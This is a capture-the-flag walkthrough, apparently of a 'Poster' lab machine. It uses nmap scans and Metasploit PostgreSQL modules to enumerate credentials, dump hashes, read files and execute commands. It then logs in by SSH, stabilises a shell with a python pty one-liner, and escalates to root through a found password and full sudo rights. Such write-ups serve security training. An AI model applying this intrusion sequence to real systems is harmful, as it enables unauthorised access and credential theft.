Poster

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.65.15

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80,5432

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 22,80,5432 -oN nmap 10.10.65.15

Enumeration

We are told to go to Metasploit and look for a auxiliary module that allows us to enumerate user credentials, so lets do that.

Lets start Metasploit

msfconsole

Now lets look for the module

Its the 4th one, so lets select it and set the options

Lets now run the enumeration tool

We have the username and password.

Lets answer the next 2 questions as we have the answers

Now we have to find the module that will allow us to execute command with the credentials we just found.

It is number 6, lets select it and set the options

Lets run it.

We have the Version, we can answer the next two questions

Next we have to find the module that will dump user hashes

This time it is number 8, so lets select it and set the options

Lets run it.

We have 6 usernames and their passwords which have been hashed. We can answer the next two questions

Next we have to find the module that will allow an authenticated user to view files of their choosing.

This time it is number 5, lets select it, set the options and run it.

Now , we have to look for the module that allows arbitrary command execution.

It is number 2, lets select it and set the options, we can also answer the next two questions

Lets run it

Looking back at the usernames and credentials we found, we can try to cd into one of the users directory and list the files

This file looks interesting, lets read it.

We have the password, lets ssh into the machine.

Privilege Escalation

We cannot read the user flag and did not have sudo permissions, so lets run LinEnum.sh on the machine to look for interesting files. First we have to start a http server and download the file on the victim machine.

You can stabilize the shell with this command

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now lets download the file, make sure you are in the tmp folder as other folders do not give permissions to download files.

Lets make the script an executable

Now lets run it.

./LinEnum.sh

Long story short, I found nothing and I even tried Linpeas but found nothing interesting, maybe I am not looking at the right thing lol, anyways so I remembered there was a web server running on the machine, so I went to /var/www/html to look for clues and found this interesting file.

Lets read it.

We have the password for the user Alison, lets switch users.

We have sudo permission on this user, so lets see what we can run

Looks like we can run all commands, so lets switch users to root

We can now read the user flag and the root flag.

Last updated